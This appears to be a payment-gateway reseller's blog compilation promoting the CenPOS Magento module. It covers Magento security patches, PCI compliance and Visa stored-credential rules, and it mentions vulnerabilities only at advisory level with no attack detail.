Magento Security Alert requires action to maintain PCI Compliance

Magento 2.3.1, 2.2.8 and 2.1.17 Security Update

A SQL injection vulnerability has been identified in pre-2.3.1 Magento code. To quickly protect your store from this vulnerability only, install patch PRODSECBUG-2198. However, to protect against this vulnerability and others, you must upgrade to Magento Commerce or Open Source 2.3.1 or 2.2.8. We strongly suggest that you install these full patches as soon as you can.

PCI Compliance Requirement 6: Develop and maintain secure systems and applications. All critical systems must have the most recently released software patches to prevent exploitation. The average merchant relies upon third party developers for web site maintenance, but unless specifically contracted to update the e-commerce software and add-on modules, don’t count on it.

Only 16.4% of organizations that had suffered a data breach were compliant with Requirement 6, compared to an average of 64% of organizations assessed by our QSAs in 2014- Verizon 2015 PCI Compliance Report.

Payment gateway implementation requirements have changed over time as a result of cross-site scripting and cross-site request forgery (CSRF) to meet current PCI Compliance standards. Merchants should verify all components of their ecommerce ecosystem are current, and have a system for ongoing monitoring and updating.

RESOURCES

  • Magento Security Center
  • MAGENTO SECURITY ALERT, March 26, 2019
  • Christine Speedy, 3D Merchant Services, offers a Magento payment gateway module for merchants to improve their omnichannel customer experience and mitigate fraud and vulnerability risk. Special B2B customer benefits include friction-less payments across all sales channels; text and email Express Checkout, customer invoice portal for 24/7 ACH, credit card, wire and more payment types, and US EMV with level 3 processing. Magento and ERP modules combine to provide a powerful array of solutions to improve cash flow and profits while maximizing security. 954-942-0483.

Magento Developer Alert: Visa Mandate and Payment Gateways

How can Magento developers help merchants get compliant with the Visa Stored Credential Transaction framework and mandates effective October 14, 2017?

Drive your profits while helping clients keep compliant with fast changing credit card processing rules.

Step by step guide:

How will clients manage consent record requirements? See Improving Authorization Management for Transactions with Stored Credentials https://usa.visa.com/dam/VCOM/global/support-legal/documents/stored-credential-transaction-framework-vbs-10-may-17.pdf . Will gateway provide a checkbox for consent records and ability to retrieve records on demand? (I called authorize.net on October 2 and they advised they will not offer this service, and will leave up to merchants.) Will you develop a custom application to include opt-in date, time and other requirements, plus storage and retrieval capability? Will you advise merchants to choose a technology solution, including payment gateway, that will manage automatically?  CenPOS, a merchant-centric, end-to-end payments engine that drives enterprise-class solutions for businesses, saving them time and money, while improving their customer engagement will provide an automated solution for clients. Contact me for the plugin.

Update terms and conditions. Ensure online order terms include sale, refund and cancellation policies. Add a checkbox for customer opt-in to terms, including online payments. CenPOS has an opt-in box and you can customize the text.

Verify if there’s a system to manage authorization validity. What the heck does that mean? Many businesses, especially B2B companies, have complex needs including pre-authorizations, incremental authorizations, delayed shipping etc. While merchants may get issuer approvals, that doesn’t mean the authorization is valid. The two most common rules businesses struggle with are “Settlement within 72 hours” for card not present sales, and “Authorization amount and settlement amount must be equal”. (I asked authorize.net support about both items on October 2 and was told they do not offer automated solution.) CenPOS automates compliance. Other payment gateways are incapable or may leave it up to developers to create a solution. How can a developer verify if merchant has an issue? Ask clients to look at their merchant statement ‘pending interchange fees. If you see EIRF or STD, that’s a red flag there’s a problem.

Create a hosted pay page. B2B Businesses almost always have more than one sales channel and use of paper credit card authorization forms is common. They need help to eliminate. You already have the SSL certificate, so it’s a natural add on to provide clients a secure web page with an iframe a solution to collect payments. With CenPOS, end customers can use the same stored credential in Magento and the pay page, both credit card and ACH. hosted online pay pagePrevent brute force attacks. System hardening is a PCI compliance requirement. See Visa best practices to prevent brute force attacks. https://usa.visa.com/support/merchant/library/visa-merchant-business-news-digest.html. CenPOS includes recaptcha and client managed velocity and other rules as part of a layered security approach.

Payment Gateway checklist:

  • Verify payment gateway will send correct transaction data and flags for the initial transaction and subsequent transactions.
  • Advise clients to set gateway for zero dollar authorization when storing a new card.
  • Ensure client is registered for 3-D Secure and it’s enabled.
  • Confirm if gateway will automatically flag a transaction as customer initiated stored credential or merchant initiated stored credential (automated recurring billing). Additionally, the merchant initiated transaction must be sent with the MOTO indicator, not ecommerce.
  • Does gateway support level 3 data?

CenPOS manages all compliance and other items seamlessly in the background.

Communicate with clients. Advise any upcoming changes will increase efficiency and security for everyone. Advise clients to learn more about CenPOS payment gateway – call Christine Speedy, 954-815-6040.

Why comply? With full compliance and following my recommendations, merchants can expect better qualified interchange rates, increased approvals (avoid declines based on issuer risk averse algorithms), reduced PCI Compliance burden, fraud liability shift to issuer and increased efficiency for both buyer and seller. The cost of non-compliance is hefty, including higher interchange rates, penalty fees, and risk of both issuer and cardholder chargebacks.

interchange rate qualification

The same transaction can process at different rates as shown above, depending on which rules you follow. CenPOS Smart Rate Selector automates compliance to qualify transactions at the lowest rate possible. Which rates are on your merchant statement now?

Magento developer billing: Developers also need to comply with recurring billing requirements for your sales. What’s worked before is not compliant- everyone needs to change.

Resources and documentation /blog/merchant-bulletins-downloads – bookmark it!.  Join Christine Speedy’s email list.

DISCLAIMER: condensed and incomplete information! Information may be quickly outdated.

With the fast pace of changing rules, developers need a technology partner to automate compliance. Did you know?

  • For those not ready to give up paper, CenPOS creates a printable PCI Compliant credit card authorization form for every stored card.
  • CenPOS has ERP, ecommerce shopping cart, accounting and other plug-in modules available for quick and easy implementation.
  • I’ve been selling for CenPOS since day 1. Though I have other payment gateways available in my arsenal, nothing else compares for meeting business to business needs.

Christine Speedy, CenPOS authorized reseller, 954-942-0483 is based out of South Florida and NY. CenPOS is a merchant-centric, end-to-end payments engine that drives enterprise-class solutions for businesses, saving them time and money, while improving their customer engagement. CenPOS secure, cloud-based solution optimizes acceptance for all payment types across multiple channels without disrupting the merchant’s banking relationships.

MAGENTO VULNERABILITIES IMPACT PCI COMPLIANCE

Magento, a popular e-commerce platform, released multiple security patches this year, several addressing critical and high credit card data breach vulnerabilities. Merchants that haven’t deployed security patches, as required by PCI standards, are vulnerable to remote exploits that can compromise customer account and credit card data.

One cross-site scripting (XSS) flaw potentially allows an attacker to add malicious JavaScript code to a comment via the PayFlow Pro payment module. The JavaScript code is executed server-side when the targeted site’s administrator views the attacker’s order.

PCI Compliance Requirement 6: Develop and maintain secure systems and applications. All critical systems must have the most recently released software patches to prevent exploitation. The average merchant relies upon third party developers for web site maintenance, but unless specifically contracted to update the e-commerce software and add-on modules, don’t count on it.

Only 16.4% of organizations that had suffered a data breach were compliant with Requirement 6, compared to an average of 64% of organizations assessed by our QSAs in 2014- Verizon 2015 PCI Compliance Report.

Payment gateway implementation requirements have changed over time as a result of cross-site scripting and cross-site request forgery (CSRF) to meet current PCI Compliance standards. Merchants should verify all components of their ecommerce ecosystem are current, and have a system for ongoing monitoring and updating.

RESOURCES

  • Magento Security Center
  • VISA MAGENTO SECURITY ALERT, July 2016
  • Christine Speedy, 3D Merchant Services, offers Magento payment gateway module for merchants to improve their omnichannel customer experience and mitigate risk. B2B customer benefits include friction-less payments across all sales channels; text and email Express Checkout, customer invoice portal for 24/7 ACH, credit card, wire and more payment types, and US EMV with level 3 processing. Magento and ERP modules combine to provide a powerful array of solutions to improve cash flow and profits while maximizing security. 954-942-0483.

 

 

B2B Magento payment gateway extension -CenPOS

The perfect global B2B Magento payment gateway extension must support level 3 processing, since it significantly impacts profit margins. Connecting to Dynamics AX, Infor, SAP and other ERP’s can also help reduce PCI Compliance burden, with one gateway for all revenue channels.

magento logo

For international sales needs, a global gateway can be more than a secure payment module. For example, with CenPOS treasury management, route transactions to the local bank partner based on the card issuer.

  • Eliminate expensive cross-border interchange fees
  • Route processing to countries with lower interchange rates
  • Eliminate currency exchange fees when repatriating funds back to country where sale originated
  • Qualify for level III interchange rates on eligible corporate, purchasing, business cards; more than just supporting level III, there are many rules to comply with to get the reduced rates

The CenPOS Magento module is not available in any marketplace. To get it FREE, contact Christine Speedy today, 954-942-0483.

 

Magento B2B Payment Gateway Developer Selection – CenPOS vs Authorize.net vs

Which is the best payment gateway for Magento developers B2B clients?

The answer lies in Magento top user concerns, which are security & PCI Compliance, cost, customer experience and flexibility with other systems including ERP and accounting.

Security and PCI Compliance: PCI should be a non-issue as any payment gateway being suggested for a B2B company should be level 1 PCI Compliant. However, developers can help merchants reduce PCI Compliance burden by partnering with a B2B payment gateway specialist who can recommend payment gateway solutions compatible with all business needs, not just Magento. For example, does the business also send invoices from an ERP? Do salesmen or credit managers get credit card numbers via fax or phone? Magento developers are not experts in payments and cannot be expected to ask the right questions to help solve unrelated compliance problems.

Internal and external fraud protection are critical. At a minimum, the payment gateway must support 3-D Secure, including Verified by Visa and MasterCard SecureCode to shift liability for certain types of fraud from merchant to card issuer.

Payment Gateway Cost: The worst mistake is recommending or selection a payment gateway based on per transaction cost. The payment gateway plays a critical role in interchange rate qualification, which comprises over 95% of merchant fees. Gateway capabilities, and lack thereof, can literally double the cost of credit card acceptance for B2B. The most important base criteria is it must support Level 3 processing. There are many nuances to qualifying transactions correctly, that most credit card processor salesmen don’t understand, so there’s little expectation a developer would have the global financial expertise to recommend the best choice.

Treasury Management: Where are your customers? Where are your offices? What currency do you want to collect and bill in? Authorize.net has virtually nothing to help manage cross-border sales. CenPOS has a multitude of treasury solutions that can be customized.

For example, a company bills everything from the US, but also has operations in Canada and the European Union. Authorize.net will process every transaction in USD. The company pays cross-border fees on foreign issued cards, which now exceed 1% in some cases, and then pays again to repatriate revenue back to the EU or Canadian operations. CenPOS automatically identifies and processes the transaction in the local issuer currency, avoiding costly cross-border fees and more expensive US interchange rates, and deposits in the regional account. It does this seamlessly with no special developer programming.

Customer Experience: Will the gateway enhance or detract? In most cases, there’s very little difference in the checkout experience, but for B2B, there’s a bigger picture. What if the customer buys via multiple channels? Sharing tokens across multiple channels, including for emailed invoices may be important. A holistic look at all sales channels and payment methods is essential, but it’s not a good use of a developers time, thus deferring to payment expert will yield a better ROI for developer and better result for the business.

Flexibility: Payment acceptance types, global availability, omnichannel integrations, flexibility and scalability are all factors in choosing not only the best B2B payment gateway for Magento, but also for the entire organization. For example, if there’s also a retail component, US businesses also need an EMV solution that supports level 3 processing for retail. If the distributor is global, how many countries is the gateway available in?

Back Office Efficiency: If you’ve ever done research in Authorize.net reports, and then in CenPOS, you’ll appreciate the massive difference between download and search vs dynamic drill down within CenPOS online reports. CenPOS reports were designed with input from today’s businesses, not those of over a decade ago. Too many differences to mention here.

There’s a plethora of misinformation across multiple industries ranging from consultants to developers. Defaulting to Authorize.net or Payflow Pro because they’re two of the oldest payment gateways, is an injustice to the end user. Payment gateway selection plays a crucial role in business profits, security and efficiency. By partnering with a payments expert, clients are provided the best solution, and Magento developers can grow revenues with specialty implementation and add-on services the expert recommends.  

“I have some knowledge of Magento, including as a developer in it’s early years, but I’m not a Magento expert,” says Christine Speedy, owner of 3D Merchant Services and B2B payment gateway expert. “Likewise, there are great B2B Magento developers, that are not payment gateway experts. By partnering, we can offer businesses more appropriate solutions to maximize profits and security, while also mutually benefiting. “